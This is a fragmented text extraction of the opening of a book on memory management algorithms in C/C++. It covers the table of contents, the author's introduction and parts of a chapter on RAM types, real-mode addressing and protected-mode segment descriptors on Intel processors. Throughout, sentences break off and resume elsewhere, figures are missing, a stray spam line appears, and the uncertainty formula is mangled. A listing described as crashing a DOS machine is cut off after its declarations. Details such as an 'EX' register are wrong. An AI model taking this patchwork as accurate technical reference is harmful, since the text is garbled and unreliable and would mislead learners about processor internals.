!! Memory Management Algorithms and Implementation in C C++
!! Memory Management Algorithms and Implementation in C C++
!! Memory Management Algorithms and Implementation in C C++
com
* Updated Most Popular Stuff On The Net.
by
Bill Blunden
ISBN 1-55622-347-1
10 9 8 7 6 5 4 3 2 1
0208
Product names mentioned are used for identification purposes only and may be trademarks of
their respective companies.
All inquiries for volume purchases of this book should be addressed to Wordware
Publishing, Inc., at the above address. Telephone inquiries may be made by calling:
(972) 423-0090
This book is dedicated to Rob, Julie, and Theo.
iii
Table of Contents
Acknowledgments . . . . . . . . . . . . . . . . . . . . . . xi
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . xiii
v
Table of Contents
Memory Allocation . . . . . . . . . . . . . . . . . . . . 66
Case Study: Linux . . . . . . . . . . . . . . . . . . . . . . 67
History and MINIX . . . . . . . . . . . . . . . . . . . . 67
Design Goals and Features. . . . . . . . . . . . . . . . 68
Linux and Segmentation . . . . . . . . . . . . . . . . . 69
Linux and Paging . . . . . . . . . . . . . . . . . . . . . 72
Three-Level Paging . . . . . . . . . . . . . . . . . . 72
Page Fault Handling . . . . . . . . . . . . . . . . . . 76
Memory Allocation . . . . . . . . . . . . . . . . . . . . 76
Memory Usage . . . . . . . . . . . . . . . . . . . . . . 81
Example: Siege Warfare . . . . . . . . . . . . . . . . . 82
Example: Siege Warfare, More Treachery . . . . . . . 87
Case Study: Windows . . . . . . . . . . . . . . . . . . . . 92
Historical Forces . . . . . . . . . . . . . . . . . . . . . 92
Memory Map Overview . . . . . . . . . . . . . . . . . 96
Windows and Segmentation . . . . . . . . . . . . . . . 99
Special Weapons and Tactics . . . . . . . . . . . . . 99
Crashing Windows with a Keystroke . . . . . . . . 102
Reverse Engineering the GDT . . . . . . . . . . . 102
Windows and Paging . . . . . . . . . . . . . . . . . . 105
Linear Address Space Taxonomy . . . . . . . . . . 105
Musical Chairs for Pages. . . . . . . . . . . . . . . 106
Memory Protection . . . . . . . . . . . . . . . . . 108
Demand Paging . . . . . . . . . . . . . . . . . . . . 109
Memory Allocation . . . . . . . . . . . . . . . . . . . 110
Memory Usage . . . . . . . . . . . . . . . . . . . . . 114
Turning Off Paging . . . . . . . . . . . . . . . . . . . 117
Example: Things That Go Thunk in the Night . . . . 118
Closing Thoughts . . . . . . . . . . . . . . . . . . . . . 122
References . . . . . . . . . . . . . . . . . . . . . . . . . 123
Books and Articles . . . . . . . . . . . . . . . . . . . 123
Web Sites . . . . . . . . . . . . . . . . . . . . . . . . 125
vi
Table of Contents
vii
Table of Contents
Tests . . . . . . . . . . . . . . . . . . . . . . . . . . . 242
Trade-Offs . . . . . . . . . . . . . . . . . . . . . . . . 247
malloc() Version 2: Sequential Fit . . . . . . . . . . . 248
Theory . . . . . . . . . . . . . . . . . . . . . . . . . . 249
Implementation . . . . . . . . . . . . . . . . . . . . . 251
memmgr.cpp . . . . . . . . . . . . . . . . . . . . . 251
mallocV2.cpp . . . . . . . . . . . . . . . . . . . . . 260
driver.cpp . . . . . . . . . . . . . . . . . . . . . . . 261
Tests . . . . . . . . . . . . . . . . . . . . . . . . . . . 262
Trade-Offs . . . . . . . . . . . . . . . . . . . . . . . . 264
malloc() Version 3: Segregated Lists . . . . . . . . . 265
Theory . . . . . . . . . . . . . . . . . . . . . . . . . . 265
Implementation . . . . . . . . . . . . . . . . . . . . . 266
memmgr.cpp . . . . . . . . . . . . . . . . . . . . . 267
mallocV3.cpp . . . . . . . . . . . . . . . . . . . . . 274
Tests . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Trade-Offs . . . . . . . . . . . . . . . . . . . . . . . . 279
Performance Comparison . . . . . . . . . . . . . . . . . 279
viii
Table of Contents
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355
ix
Acknowledgments
xi
Acknowledgments
xii
Introduction
xiii
Introduction
Historical Setting
In the late 1930s, a group of scholars arrived at Bletchley Park in an
attempt to break the Nazis’ famous Enigma cipher. This group of
codebreakers included a number of notable thinkers, like Tommy
Flowers and Alan Turing. As a result of the effort to crack Enigma,
the first electronic computer was constructed in 1943. It was named
Colossus and used thermionic valves (known today as vacuum tubes)
for storing data. Other vacuum tube computers followed. For exam-
ple, ENIAC (electronic numerical integrator and computer) was
built by the U.S. Army in 1945 to compute ballistic firing tables.
xiv
Introduction
ASIDE
“After 45 minutes or so, we’ll see that the results are
obvious.”
— David M. Lee
I have heard Nobel laureates in physics, like Dave Lee,
complain that students who rely too heavily on calculators
lose their mathematical intuition. To an extent, Dave is cor-
rect. Before the dawn of calculators, errors were more com-
mon, and developing a feel for numeric techniques was a
useful way to help catch errors when they occurred.
During the Los Alamos project, a scientist named Dick
Feynman ran a massive human computer. He once mentioned
that the performance and accuracy of his group’s computa-
tions were often more a function of his ability to motivate
people. He would sometimes assemble people into teams
and have them compete against each other. Not only was
this a good idea from the standpoint of making things more
interesting, but it was also an effective technique for catching
discrepancies.
xv
Introduction
In 1958, the first integrated circuit was invented. The inventor was
a fellow named Jack Kilby, who was hanging out in the basement of
Texas Instruments one summer while everyone else was on vaca-
tion. A little over a decade later, in 1969, Intel came out with a 1
kilobit memory chip. After that, things really took off. By 1999, I
was working on a Windows NT 4.0 workstation (service pack 3) that
had 2GB of SDRAM memory.
The general trend you should be able to glean from the previous
discussion is that memory components have solved performance
requirements by getting smaller, faster, and cheaper. The hardware
people have been able to have their cake and eat it too. However,
the laws of physics place a limit on how small and how fast we can
actually make electronic components. Eventually, nature itself will
stand in the way of advancement. Heisenberg’s Uncertainty Princi-
ple, shown below, is what prevents us from building infinitely small
components.
x p (h/4 )
For those who are math-phobic, I will use Heinsenberg’s own words
to describe what this equation means:
“The more precisely the position is determined, the less pre-
cisely the momentum is known in this instant, and vice versa.”
In other words, if you know exactly where a particle is, then you
will not be able to contain it because its momentum will be huge.
Think of this like trying to catch a tomato seed. Every time you try
to squeeze down and catch it, the seed shoots out of your hands and
flies across the dinner table into Uncle Don’s face.
Einstein’s General Theory of Relativity is what keeps us from
building infinitely fast components. With the exception of black
holes, the speed limit in this universe is 3x108 meters per second.
Eventually, these two physical limits are going to creep up on us.
When this happens, the hardware industry will have to either
make larger chips (in an effort to fit more transistors in a given area)
or use more efficient algorithms so that they can make better use of
existing space. My guess is that relying on better algorithms will be
the cheaper option. This is particularly true with regard to memory
management. Memory manipulation is so frequent and crucial to
performance that designing better memory management subsys-
tems will take center stage in the future. This will make the time
spent reading this book a good investment.
xvi
Introduction
Impartial Analysis
In this book, I try very hard to offer memory management solutions
without taking sides. I have gone to great lengths to present an
unbiased discussion. This is important because it is extremely
tempting to champion a certain memory management algorithm
(especially if you invented it). There are some journal authors who
would have you believe that their new algorithm is a panacea to
cure the ills of the world. I do not have the ulterior motives of a col-
lege professor. I am here to offer you a set of tools and then let you
decide how best to use them. In this book, I will present you with
different techniques and try to point out the circumstances in which
they perform well.
The question “Which is the best memory management algo-
rithm?” is very similar in spirit to any of the following questions:
“Which operating system is the best?”
“Which programming language is the best?”
“Which data structure is the best?”
“Which type of screwdriver is the best?”
I can recall asking a program manager at Eaton Corp., John
Schindler, what the best operating system was. John was managing
at least a dozen different high-end platforms for Eaton, and I
thought he would know. I was expecting him to come right back
with a quick answer like: “Oh, OpenBSD is the best.” What actually
happened was something that surprised me. He looked at me for a
minute, as if the question was absurd. Then he smiled and said,
“Well, it really depends on what you’re going to use the machine for.
I use Solaris for networking, HP-UX for app servers, AIX to talk to
our mainframe, NT for mail, . . . ”
The truth is there is no “best” solution. Most solutions merely
offer certain trade-offs. In the end, the best tool to use will depend
upon the peculiarities of the problem you are trying to solve.
This is a central theme that appears throughout the domain of
computer science. Keep it in the back of your mind, like some sort
of Buddhist mantra:
“There is no best solution, Grasshopper, only trade-offs.”
For example, linked lists and arrays can both represent a linear set
of items. With a linked list, you get easy manipulation at the
expense of speed. Adding an element to a linked list is as easy as
modifying a couple of pointers. However, to find a given list
xvii
Introduction
element, you may have to traverse the entire list manually until you
find it. Conversely, with an array, you get access speed at the
expense of flexibility. Accessing an array element is as easy as add-
ing an integer to a base address, but adding and deleting array
elements requires a lot of costly shifting. If your code is not going to
do a lot of list modification, an array is the best choice. If your code
will routinely add and delete list members, a linked list is the better
choice. It all depends upon the context of the problem.
Audience
This book is directed toward professional developers and students
who are interested in discovering how memory is managed on pro-
duction systems. Specifically, engineers working on PC or
embedded operating systems may want to refresh their memory or
take a look at alternative approaches. If this is the case, then this
book will serve as a repository of algorithms and software compo-
nents that you can apply to your day-to-day issues.
Professionals who design and construct development tools will
also find this book useful. In general, development tools fall into the
class of online transaction processing (OLTP) programs. When it
comes to OLTP apps, pure speed is the name of the game. As such,
programming language tools, like compilers, often make use of
suballocators to speed up the performance of the code that manipu-
lates their symbol table.
With regard to compiling large software programs consisting of
millions of lines of code, this type of suballocator-based optimization
can mean the difference between waiting for a few minutes and
waiting for a few hours. Anyone who mucks around with
suballocators will find this book indispensable.
Software engineers who work with virtual machines will also be
interested in the topics that I cover. The Java virtual machine is
famous for its garbage collection facilities. In this book I explore
several automatic memory management techniques and also pro-
vide a couple of concrete garbage collection implementations in
C++.
Finally, this book also targets the curious. There is absolutely
nothing wrong with being curious. In fact, I would encourage it. You
may be an application developer who has used memory manage-
ment facilities countless times in the past without taking the time to
xviii
Introduction
determine how they really work. You may also have nurtured an
interest that you have had to repress due to deadlines and other pri-
orities. This book will offer such engineers an opportunity to
indulge their desire to see what is going on under the hood.
Organization
This book is divided into six chapters. I will start from the ground
up and try to provide a comprehensive, but detailed, view of mem-
ory management fundamentals. Because of this, each chapter builds
on what has been presented in the previous one. Unless you are a
memory management expert, the best way to read this book is
straight through.
xix
Introduction
operating system that took advantage of all four layers. All the sys-
tems that I examined use a vastly simplified two-layer scheme.
xx
Introduction
Approach
When it comes to learning something complicated, like memory
management, I believe that the most effective way is to examine a
working subsystem. On the other hand, it is easy to become lost in
the details of a production memory manager. Contemporary mem-
ory managers, like the one in Linux, are responsible for keeping
track of literally hundreds of run-time quantities. Merely tracking
the subsystem’s execution path can make one dizzy. Hence, a bal-
ance has to be struck between offering example source code that is
high quality and also easy to understand. I think I have done a suffi-
cient job of keeping the learning threshold low without sacrificing
utility.
xxi
Introduction
Typographical Conventions
Words and phrases will appear in italics in this book for two reasons:
n To place emphasis
n When defining a term
The courier font will be used to indicate that text is one of the
following:
n Source code
n An address in memory
n Console input/output
n A filename or extension
Numeric values appear throughout this book in a couple of different
formats. Hexadecimal values are indicated by either prefixing them
with “0x” or appending “H” to the end.
For example:
0xFF02
0FF02H
The C code that I include will use the former notation, and the
assembler code that I include will use the latter format.
Binary values are indicated by appending the letter “B” to the
end. For example:
0110111B
Prerequisites
“C makes it easy to shoot yourself in the foot; C++ makes it
harder, but when you do, it blows away your whole leg.”
— Bjarne Stroustrup
xxii
Introduction
interrupts, that can only be fleshed out using assembler. This is one
reason why mid-level languages, like C, provide syntactic facilities
for inline assembly code. If you look at the Linux source code, you
will see a variety of inline assembly code snippets. If at all possible,
I wrapped my assembly code in C. However, you can’t always do
this.
Learning assembly language may seem like an odious task, but
there are several tangible and significant rewards. Assembly lan-
guage is just a mnemonic representation of machine instructions.
When you have a complete understanding of a processor’s assembly
language, including its special “privileged” instructions, you will
also have a fairly solid understanding of how the machine functions
and what its limitations are. In addition, given that compilers gener-
ate assembly code, or at least spit it out in a listing file, you will also
be privy to the inner workings of development tools.
In short, knowing assembly language is like learning Latin. It
may not seem immediately useful, but it is . . . just give it time.
I use C early in the book for small applications when I felt like I
could get away with it. Most of the larger source code examples in
this book, however, are written in C++. If you don’t know C or
C++, you should pick up one of the books mentioned in the “Refer-
ences” section at the end of the Introduction. After a few weeks of
cramming, you should be able to follow my source code examples.
I think C++ is an effective language for implementing memory
management algorithms because it offers a mixture of tools. With
C++, you can manipulate memory at a very low, bit-wise level and
invoke inline assembly code when needed. You can also create
high-level constructs using the object-oriented language features in
C++. Encapsulation, in particular, is a compiler-enforced language
feature that is crucial for maintaining large software projects.
NOTE At times, you may notice that I mix C libraries and conven-
tions into my C++ source code. I do this, most often, for reasons
related to performance. For example, I think that C’s printf() is
much more efficient than cout.
xxiii
Introduction
Companion Files
Software engineering is like baseball. The only way you will ever
acquire any degree of skill is to practice and scrimmage whenever
you get the chance. To this end, I have included the source code for
most of the examples in this book in a downloadable file available at
www.wordware.com/memory.
Dick Feynman, who was awarded the Nobel Prize in physics in
1965, believed that the key to discovery and insight was playful
experimentation. Dick was the kind of guy who followed his own
advice. In his biography, Surely You’re Joking, Mr. Feynman, Dick
recounts how spinning plates in a dining hall at Cornell led to his-
toric work in quantum mechanics. By testing a variety of new ideas
and comparing the results to your predictions, you force yourself to
xxiv
Introduction
References
Brey, Barry. The Intel Microprocessors: 8086/8088, 80186, 80286,
80386, 80486, Pentium, Pentium Pro, and Pentium II. 2000,
Prentice Hall, ISBN: 0-13-995408-2.
This is a fairly recent book and should take care of any ques-
tions you may have. Barry has been writing about Intel chips
since the first one came out.
Kernighan, Brian and Dennis Ritchie. The C Programming Lan-
guage. 1988, Prentice Hall, ISBN: 0131103628.
This is a terse, but well-read introduction to C by the founding
fathers of the language.
Reid, T. R. The Chip: How Two Americans Invented the Microchip
and Launched a Revolution. 2001, Random House, ISBN:
0375758283.
Schildt, Herbert. C++ From the Ground Up. 1998, Osborne
McGraw-Hill, ISBN: 0078824052.
If you have never programmed in C/C++, read this book. It is
a gentle introduction written by an author who knows how to
explain complicated material. Herb starts by teaching you C and
then slowly introducing the object-oriented features of C++.
Stroustrup, Bjarne and Margaret Ellis. The Annotated C++ Refer-
ence. 1990, Addison-Wesley, ISBN: 0201514591.
Once you have read Schildt’s book, you can use this text to fill
in the gaps. This book is exactly what it says it is — a reference
— and it is a good one.
xxv
Introduction
Warning
In this book I provide some rather intricate, and potentially danger-
ous, source code examples. This is what happens when you go
where you are not particularly supposed to be. I recommend that
you use an expendable test machine to serve as a laboratory. Also,
you might want to consider closing all unnecessary applications
before experimenting. If an application dies in the middle of an
access to disk, you could be faced with a corrupt file system.
If you keep valuable data on the machine you are going to use, I
suggest you implement a disaster recovery plan. During the writing
of this book’s manuscript, I made a point to perform daily incremen-
tal backups and complete weekly backups of my hard drive. I also
had a secondary machine that mirrored by primary box. Large cor-
porations, like banks and insurance companies, have truly extensive
emergency plans. I toured a production site in Cleveland that had
two diesel fuel generators and a thousand gallons of gas to provide
backup power.
Neither the publisher nor author accept any responsibility for any
damage that may occur as a result of the information contained
within this book. As Stan Lee might say, “With great power comes
great responsibility.”
xxvi
Author Information
Bill Blunden has been obsessed with systems software since his
first exposure to the DOS debug utility in 1983. His single-minded
pursuit to discover what actually goes on under the hood led him to
program the 8259 interrupt controller and become an honorable
member of the triple-fault club. After obtaining a BA in mathemati-
cal physics and an MS in operations research, Bill was unleashed
upon the workplace. It was at an insurance company in the beautiful
city of Cleveland, plying his skills as an actuary, that Bill got into his
first fist fight with a cranky IBM mainframe. Bloody but not beaten,
Bill decided that groking software beat crunching numbers. This led
him to a major ERP player in the midwest, where he developed
CASE tools in Java, wrestled with COBOL middleware, and was
assailed by various Control Data veterans. Having a quad-processor
machine with 2GB of RAM at his disposal, Bill was hard pressed to
find any sort of reason to abandon his ivory tower. Nevertheless, the
birth of his nephew forced him to make a pilgrimage out west to Sil-
icon Valley. Currently on the peninsula, Bill survives rolling power
blackouts and earthquakes, and is slowly recovering from his initial
bout with COBOL.
xxvii
Chapter 1
Memory Management
Mechanisms
“Everyone has a photographic memory. Some people just don’t
have film.”
— Mel Brooks
1
2 Chapter 1
ASIDE
An arm-waving explanation is a proposition that has not been
established using precise mathematical statements. Mathe-
matical statements have the benefit of being completely un-
ambiguous: They are either true or false. An arm-waving
explanation tends to eschew logical rigor entirely in favor of
arguments that appeal to intuition. Such reasoning is at best
dubious, not only because intuition can often be incorrect, but
also because intuitive arguments are ambiguous. For example,
people who argue that the world is flat tend to rely on arm-
waving explanations.
NOTE Back when Dave Cutler’s brainchild, Windows NT, came out,
there was a lot of attention given to the operating system’s Hardware
Abstraction Layer (HAL). The idea was that the majority of the operat-
ing system could be insulated from the hardware that it ran on by a
layer of code located in the basement. This was instituted to help
counter the hardware dependency issue that I mentioned a minute
ago. To Dave’s credit, NT actually did run on a couple of traditionally
UNIX-oriented hardware platforms. This included Digital’s Alpha pro-
cessor and the MIPS RISC processor. The problem was that Microsoft
couldn’t get a number of its higher-level technologies, like DCOM, to
Memory Management Mechanisms 3
Chapter 1
a binary standard!
The solution that favors speed always wins. I was told by a former
Control Data engineer that when Seymour Cray was designing the
6600, he happened upon a new chip that was quicker than the one
he was currently using. The problem was that it made occasional
computational errors. Seymour implemented a few slick work-
arounds and went with the new chip. The execs wanted to stay out
of Seymour’s way and not disturb the maestro, as Seymour was
probably the most valuable employee Control Data had. Unfortu-
nately, they also had warehouses full of the original chips. They
couldn’t just throw out the old chips; they had to find a use for them.
This problem gave birth to the CDC 3300, a slower and less expen-
sive version of the 6600.
My point: Seymour went for the faster chip, even though it was
less reliable.
Speed rules.
The result of this tendency is that every commercial operating
system in existence has its memory management services firmly
rooted in data structures and protocols dictated by the hardware.
Processors provide a collection of primitives for manipulating mem-
ory. They constitute the mechanism side of the equation. It is up to
the operating system to decide if it will even use a processor’s
memory management mechanisms and, if so, how it will use them.
Operating systems constitute the policy side of the equation.
In this chapter, I will examine computer hardware in terms of
how it offers a mechanism to access and manipulate memory.
Memory Hierarchy
When someone uses the term “memory,” they are typically refer-
ring to the data storage provided by dedicated chips located on the
motherboard. The storage these chips provide is often referred to
as Random Access Memory (RAM), main memory, and primary stor-
age. Back in the iron age, when mainframes walked the earth, it was
called the core. The storage provided by these chips is volatile,
which is to say that data in the chips is lost when the power is
switched off.
There are various types of RAM:
n DRAM
n SDRAM
n SRAM
4 Chapter 1
n VRAM
Dynamic RAM (DRAM) has to be recharged thousands of times
each second. Synchronous DRAM (SDRAM) is refreshed at the
clock speed at which the processor runs the most efficiently. Static
RAM (SRAM) does not need to be refreshed like DRAM, and this
makes it much faster. Unfortunately, SRAM is also much more
expensive than DRAM and is used sparingly. SRAM tends to be
used in processor caches and DRAM tends to be used for wholesale
memory. Finally, there’s Video RAM (VRAM), which is a region of
memory used by video hardware. In the next chapter, there is an
example that demonstrates how to produce screen messages by
manipulating VRAM.
Recent advances in technology and special optimizations imple-
mented by certain manufacturers have led to a number of additional
acronyms. Here are a couple of them:
n DDR SDRAM
n RDRAM
n ESDRAM
DDR SDRAM stands for Double Data Rate Synchronous Dynamic
Random Access Memory. With DDR SDRAM, data is read on both
the rising and the falling of the system clock tick, basically doubling
the bandwidth normally available. RDRAM is short for Rambus
DRAM, a high-performance version of DRAM sold by Rambus that
can transfer data at 800 MHz. Enhanced Synchronous DRAM
(ESDRAM), manufactured by Enhanced Memory Systems, provides
a way to replace SRAM with cheaper SDRAM.
A bit is a single binary digit (i.e., a 1 or a 0). A bit in a RAM chip
is basically a cell structure that is made up of, depending on the type
of RAM, a certain configuration of transistors and capacitors. Each
cell is a digital switch that can either be on or off (i.e., 1 or 0). These
cells are grouped into 8-bit units call bytes. The byte is the funda-
mental unit for measuring the amount of memory provided by a
storage device. In the early years, hardware vendors used to imple-
ment different byte sizes. One vendor would use a 6-bit byte and
another would use a 16-bit byte. The de facto standard that every-
one seems to abide by today, however, is the 8-bit byte.
There is a whole set of byte-based metrics to specify the size of a
memory region:
1 byte = 8 bits
1 word = 2 bytes
1 double word = 4 bytes
Memory Management Mechanisms 5
Chapter 1
1 octal word = 8 bytes
1 paragraph = 16 bytes
1 kilobyte (KB) = 1,024 bytes
1 megabyte (MB) = 1,024KB = 1,048,576 bytes
1 gigabyte (GB) = 1,024MB = 1,073,741,824 bytes
1 terabyte (TB) = 1,024GB = 1,099,511,627,776 bytes
1 petabyte (PB) = 1,024TB = 1,125,899,906,842,624 bytes
Figure 1.1
Chapter 1
Figure 1.2
NOTE A recurring point that I will make throughout this book is the
high cost of disk input/output. As I mentioned previously, the latency
for accessing disk storage is on the order of milliseconds. This is a long
time from the perspective of a processor. The situation is analogous to
making a pizza run from a remote cabin in North Dakota. If you are
lucky, you have a frozen pizza in your freezer/cache and it will only
take 30 minutes to heat up. If you are not lucky, you will have to call
the pizza delivery guy (i.e., access the data from disk storage) and wait
for five hours as he makes the 150-mile trek to your cabin.
Using virtual memory is like making a deal with the devil. Sure, you
will get lots of extra memory, but you will pay an awful cost in terms
of performance. Disk I/O involves a whole series of mandatory
actions, some of which are mechanical. It is estimated that paging
on Windows accounts for roughly 10% of execution time. Managing
virtual memory requires a lot of bookkeeping on the part of the pro-
cessor. I will discuss the precise nature of this bookkeeping in a
later section.
ASIDE
I worked at an ERP company where one of the VPs used to
fine engineers for performing superfluous disk I/O. During
code reviews, he would grep through source code looking for
the fopen() and fread() standard library functions. We
were taught the basic lesson that you cached everything you
possibly could in memory and only moved to disk storage
when you absolutely had no other alternative (and even then
you needed permission). To the VP’s credit, the company’s
three-tier middleware suite was the fastest in the industry.
Disk storage has always been cheaper than RAM. Back in the 1960s
when 8KB of RAM was a big investment, using the disk to create
virtual memory probably made sense. Today, however, the cost dis-
crepancy between DRAM and disk drives is not as significant as it
was back then. Buying a machine with 512MB of SDRAM is not
unheard of. It could be that virtual memory will become a complete
relic or implemented as some sort of emergency safeguard.
Memory Management Mechanisms 9
Chapter 1
Each byte in DRAM is assigned a unique numeric identifier called
an address, just like houses on a street. An address is an integer
value. The first byte in memory is assigned an address of zero. The
region of memory near address zero is known as the bottom of mem-
ory, or low memory. The region of memory near the final byte is
known as high memory. The number of physical (i.e., DRAM) bytes
that a processor is capable of addressing is known as the processor’s
physical address space. (See Figure 1.3.)
Figure 1.3
Figure 1.4
When the processor reads from memory, the following steps are
performed:
1. The processor places the address of the byte to be read on the
address lines.
2. The processor sends the read signal on the control bus.
3. The DRAM chip(s) return the byte specified on the data bus.
When the processor writes to memory, the following steps are
performed:
1. The processor places the address of the byte to be written on
the address lines.
2. The processor sends the write signal on the control bus.
3. The processor sends the byte to be written to memory on the
data bus.
This description is somewhat of an oversimplification. For example,
the Pentium processor reads and writes data 4 bytes at a time. This
is one reason why the Pentium is called a 32-bit chip. The processor
will refer to its 32-bit payload using the address of the first byte
(i.e., the byte with the lowest address). Nevertheless, I think the
general operation is clear.
Memory Management Mechanisms 11
Chapter 1
You have seen how a processor reads and writes bytes to memory.
However, most processors also support two advanced memory man-
agement mechanisms: segmentation and paging.
Segmentation is instituted by breaking up a computer’s address
space into specific regions, known as segments. Using segmentation
is a way to isolate areas of memory so that programs cannot inter-
fere with one another. Segmentation affords what is known as
memory protection. It is possible to institute memory segmentation
without protection, but there are really no advantages to such a
scheme.
Under a segmentation scheme that enforces memory protection,
each application is assigned at least one segment. Large applications
often have several segments. In addition, the operating system will
also have its own custom set of segments. Segments are assigned a
specific set of access writes so that policies can be created with
regard to who can update what. Typically, the operating system code
segments will execute with the highest privilege and applications
will be loaded into segments with less authority.
Figure 1.5
The catch to all this is that the address of a byte in this artifi-
cial/virtual address space is no longer the same as the address that
the processor places on the address bus. This means that transla-
tion data structures and code will have to be established in order to
map a byte in the virtual address space to a physical byte (regard-
less of whether that byte happens to be in DRAM or on disk).
When the necessary paging constructs have been activated, the
virtual memory space is divided into smaller regions called pages. If
the operating system decides that it is running low on physical
memory, it will take pages that are currently stored in physical
memory and write them to disk. If segmentation is being used,
bookkeeping will have to be performed in order to match a given
page of memory with the segment that owns it. All of the account-
ing work is done in close conjunction with the processor so that the
performance hit associated with disk I/O can be kept to a minimum.
Figure 1.6
Chapter 1
decided to use the Pentium to help illustrate segmentation and pag-
ing. I would love to demonstrate theory with a MIPS64 processor,
but I can’t afford an SGI server (sigh). Being inexpensive is one of
the primary reasons for Intel’s continued success. Hackers, like me,
who couldn’t afford an Apple IIe back in the 1980s were left
scrounging for second-hand Intel boxes. There were thousands of
people who had to make this kind of financial decision. So, in a
sense, the proliferation of Intel into the workplace was somewhat of
a grass roots movement.
The Pentium class of processors is descended from a long line of
popular CPUs:
CPU Release Date Physical Address Space
8086 1978 1MB
8088 1979 1MB
80286 1982 16MB
80386 1985 4GB
80486 1989 4GB
Pentium 1993 4GB
Pentium Pro 1995 64GB
Pentium II 1997 64GB
Pentium III 1999 64GB
Pentium 4 2000 64GB
NOTE When the IBM PC came out in 1981, it shipped with a 4.77
MHz 8088. Without a doubt, mainframe developers were overjoyed.
This was because the PC gave them a place of their own. In those
days, the standard dummy terminals didn’t do anything more than
shuttle a data buffer back and forth to a mainframe. In addition, an
engineer had little or no control over when, or how, his code would be
run. The waiting could be agonizing. Tom Petty was right. Bribing a
sysop with pizza could occasionally speed things up, but the full court
grovel got tiring after a while. With an IBM PC, an engineer finally had
a build machine that was open all night with no waiting.
ASIDE
I know one CDC engineer, in particular, who ported a FOR-
TRAN ’77 compiler to a PC in 1982 for this very reason. His
supervisor would walk over and say: “Why do you want to run
on that little three-wheeler instead of the production ma-
chine?” His answer: “Because it is mine, damn it.” This one
statement probably summarizes the mindset that made PCs
wildly successful.
14 Chapter 1
Chapter 1
displayed in Figure 1.7.
Figure 1.7
As you can see, the “E” prefix has been removed from the regis-
ter names. In addition, each of the 16-bit general registers, AX, CX,
DX, and EX, can be manipulated in terms of two 8-bit registers. For
example, the AX register can be seen as the combination of the AH
and AL registers. The AH register refers to the high byte in AX,
and the AL register refers to the low byte in AX.
NOTE The memory and mode registers shown in Figure 1.2 are still
visible in real mode. They still exist if the processor is a 32-bit class
CPU but they have no significance or use in real mode. The only
exception to this rule is if you are trying to switch to protected mode.
Sometimes, for reasons that I will explain later, this is also written
as:
0x8200[0]:0x0100
Figure 1.8
NOTE The fact that there are six segment registers means that at
any time, only six segments of memory can be manipulated. A pro-
gram can have more than six segments, but only six can be accessible
at any one point in time.
Memory Management Mechanisms 17
Chapter 1
bits in size. Given that an offset address is 16 bits, this limits each
segment to 64KB in size.
QUESTION
If the segment address and offset address are both stored in
16-bit registers, how can the sum of two 16-bit values form a
20-bit value?
ANSWER
The trick is that the segment address has an implicit zero
added to the end. For example, a segment address of 0x0C00 is
treated as 0x0C000 by the processor. This is denoted, in practice,
by placing the implied zero in brackets (i.e., 0x0C00[0]). This is
where the processor comes up with a 20-bit value.
As you can see, the real mode segment/offset approach does provide
a crude sort of segmentation. However, at no point did I mention
that the boundaries between segments are protected. The ugly
truth is that there is no memory protection in real mode. When you
run a program in real mode, it owns everything and can run amok if
it wants.
Running an application in real mode is like letting a den of Cub
Scouts into your home. They’re young, spirited, and all hopped-up
on sugar. If you’re not careful, they will start tearing the house
down. Crashing a real mode machine is simple, and there is little
you can do to prevent it (other than back up your work constantly).
In case you are wondering, and I’m sure some of you are, here is
an example of a C program that can crash a computer running in real
mode:
/* --crashdos.c-- */
void main()
{
unsigned char *ptr;
int i;
Intel’s processors would never have made inroads into the enter-
prise with this kind of Mickey Mouse memory management. In an
attempt to support more robust operating systems and larger
address spaces, Intel came out with the 80386. The 80386 had a
physical address space of 4GB and supported a new mode of opera-
tion: protected mode.
Chapter 1
The best way to understand segmentation on Intel is to take a visual
look at how it is implemented. A picture is worth 1,024 words, and
that is particularly true in this case. So take a good, hard look at
Figure 1.9 and compare it to Figure 1.8. You might also want to
bookmark Figure 1.9 so that you can return to it when needed.
Figure 1.9
The first thing to note is that protected mode uses the full-blown
set of Pentium registers displayed in Figure 1.2. Back to 32-bit reg-
isters we go. Also, the segment registers no longer store 16-bit
segment address values. Instead, it holds what is known as a seg-
ment selector.
A segment selector is a 16-bit data structure containing three
fields. Its composition is displayed in Figure 1.10. The really impor-
tant field is the index field. The index field stores an index to a
descriptor table. Index values start at zero.
Figure 1.10
NOTE Almost all of the operating systems this book examines focus
on the GDT and offer very minimal use of the LDT (if they use it at all).
Figure 1.11
Memory Management Mechanisms 21
QUESTION
Chapter 1
How does the processor map a segment selector’s index to a
descriptor?
ANSWER
The processor takes the index, specified by the segment
selector, multiplies the index by eight (as in 8 bytes because
descriptors are 64 bits in length), and then adds this product to
the base address specified by GTDR or LDTR.
NOTE In case you are looking at Figure 1.2 and wondering about
the other two memory management registers, IDTR and TR, I did not
forget them. They are not as crucial to this discussion as GDTR and
LDTR. The IDTR and TR registers are used to manage hardware inter-
rupts and multitasking. This book is focused on pure memory
management, so I will not discuss these registers in any detail. If you
happen to be interested, I recommend that you pick up the Intel man-
ual referenced at the end of this chapter.
Figure 1.12
descriptor. There are two fields that might not be obvious just from
looking at Figure 1.11. First is the SS flag, which indicates whether
the segment is a system segment or just a normal code/data segment.
A system segment, in case you are scratching your head, is a seg-
ment that is used to provide interrupt handling and multitasking
services. I will not investigate either of those subjects.
NOTE You will see a number of 1-bit flags in the following few sec-
tions. For future reference, a bit is set when it is one. A bit is cleared
when it is zero. Low-level operating system code is rife with bit-based
manipulation. There is no way around it. Engineers who work with
high-level languages tend to look down on engineers who write this
type of low-level code. They are called bit-bashers or bit-twiddlers. Pro-
grammers can be cruel.
Assuming that the SS flag is set, the 4-bit type field in the
descriptor describes the specific properties of the segment:
Table 1.1
Bit
11 10 9 8 Type Description
0 0 0 0 data read-only
0 0 0 1 data read-only, accessed
0 0 1 0 data read-write
0 0 1 1 data read-write, accessed
0 1 0 0 data read-only, expand down
0 1 0 1 data read-only, expand down,
accessed
0 1 1 0 data read-write, expand down
0 1 1 1 data read-write, expand down,
accessed
1 0 0 0 code execute-only
1 0 0 1 code execute-only, accessed
1 0 1 0 code execute-read
1 0 1 1 code execute-read, accessed
1 1 0 0 code execute-only, conforming
1 1 0 1 code execute-only, conforming,
accessed
1 1 1 0 code execute-read, conforming
1 1 1 1 code execute-read, conforming,
accessed
Chapter 1
caution with regard to the circumstances in which they allow oper-
ating system segments to be conforming.
QUESTION
OK, so we understand how the segments are referenced and
what kind of metadata the segment descriptors store. How are
these memory segments protected?
ANSWER
